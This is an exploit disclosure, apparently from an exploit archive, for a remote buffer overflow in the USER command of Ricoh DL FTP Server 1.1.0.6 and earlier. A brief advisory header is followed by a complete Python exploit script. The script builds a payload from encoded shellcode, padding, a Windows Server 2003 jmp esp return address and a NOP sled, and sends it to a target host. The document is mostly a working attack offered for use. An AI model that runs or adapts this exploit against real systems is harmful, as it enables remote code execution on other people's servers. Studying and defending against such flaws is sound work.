Ricoh FTP Server versions 1.1.0.6 and below suffer from a remote buffer overflow vulnerability.
2e40b7ec94f5efc5004ef8320c004fcdad799161fdd49a36a373c9ef742e67e0
'''
Information
--------------------
Name : Ricoh FTP Server <= v1.1.0.6
Software : Ricoh DL-1 SR10.exe
Vendor Homepage : http://www.ricohpmmc.com/
Vulnerability Type : Remote Buffer Overflow
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] exploitpack [dot] com>
Description
------------------
Ricoh DL FTP Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successfully exploitation of this bug could potentially allow an attacker
to execute
arbitrary code within the context of the affected application. Failed
exploit attempts could result in a denial-of-service condition.
Exploit example as follow
-----------------------------
Basic structure: JUNK + JMPIP + NOPS + SHELLCODE
Vulnerable command: USER
!/usr/bin/python
Based on the work of Julien Ahrens:
https://www.exploit-db.com/exploits/18643/
'''
import os
import socket
import sys
def howtousage():
print "Sorry, expecting arguments: host port"
sys.exit(-1)
def run():
try:
shell = "\xba\xc9\xd2\x95\xec\xda\xd8\xd9\x74\x24\xf4\x5b\x33"
shell += "\xc9\xb1\x44\x83\xc3\x04\x31\x53\x0f\x03\x53\xc6\x30"
shell += "\x60\x10\x30\x36\x8b\xe9\xc0\x57\x05\x0c\xf1\x57\x71"
shell += "\x44\xa1\x67\xf1\x08\x4d\x03\x57\xb9\xc6\x61\x70\xce"
shell += "\x6f\xcf\xa6\xe1\x70\x7c\x9a\x60\xf2\x7f\xcf\x42\xcb"
shell += "\x4f\x02\x82\x0c\xad\xef\xd6\xc5\xb9\x42\xc7\x62\xf7"
shell += "\x5e\x6c\x38\x19\xe7\x91\x88\x18\xc6\x07\x83\x42\xc8"
shell += "\xa6\x40\xff\x41\xb1\x85\x3a\x1b\x4a\x7d\xb0\x9a\x9a"
shell += "\x4c\x39\x30\xe3\x61\xc8\x48\x23\x45\x33\x3f\x5d\xb6"
shell += "\xce\x38\x9a\xc5\x14\xcc\x39\x6d\xde\x76\xe6\x8c\x33"
shell += "\xe0\x6d\x82\xf8\x66\x29\x86\xff\xab\x41\xb2\x74\x4a"
shell += "\x86\x33\xce\x69\x02\x18\x94\x10\x13\xc4\x7b\x2c\x43"
shell += "\xa7\x24\x88\x0f\x45\x30\xa1\x4d\x03\xc7\x37\xe8\x61"
shell += "\xc7\x47\xf3\xd5\xa0\x76\x78\xba\xb7\x86\xab\xff\x48"
shell += "\xcd\xf6\xa9\xc0\x88\x62\xe8\x8c\x2a\x59\x2e\xa9\xa8"
shell += "\x68\xce\x4e\xb0\x18\xcb\x0b\x76\xf0\xa1\x04\x13\xf6"
shell += "\x16\x24\x36\x95\xf5\xbe\x97\x3f\x7d\x5a\xc8\x90\x1e"
shell += "\x84\x66\x8a\x94\xe4\x03\x27\x31\x97\xcb\xb5\xd0\x34"
shell += "\x63\x52\x02\xe9\x12\xc1\x2d\x65\xd4\x34\x81\x43\x36"
shell += "\x18\xa0\xef\x72\x46\x04\xd6\x5a\xe8\x2d\x62\xbb\x98"
shell += "\xc2\xe9\xda\x0c\x7b\x9c\x73\xb8\xf3\x40\xcd\x26\x9e"
shell += "\xe9\xa3\xcf\x13\x9e\x49\x71\xa7\x31\xdc\x02\x67\xbc"
shell += "\x49\x86\x08\x28\xaa\x67\x97\xec\xee\x77"
# User: ricoh
# Pass: Ricoh1106
junk = "\x61" * 245
jmp = "\x38\x07\xD2\x77" # jmp esp from user32.dll # Windows Server
2003 Standard Edition SP2 English USER32.DLL jmp esp 0x77D20738 G DV UV
nops = "\x90" * 16
buffer = junk + jmp + nops + shell
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((Host, int(Port)))
s1.recv(1024)
s1.send('USER ' + buffer + '\r\n')
s1.close()
print "Exploit executed successfully"
except:
print "Target not vulnerable or connection closed"
if __name__ == '__main__':
print "Ricoh DC FTP Server <= v1.1.0.6 Remote Buffer Overflow"
print "Author: Juan Sacco"
try:
Host = sys.argv[1]
Port = sys.argv[2]
except IndexError:
howtousage()
run()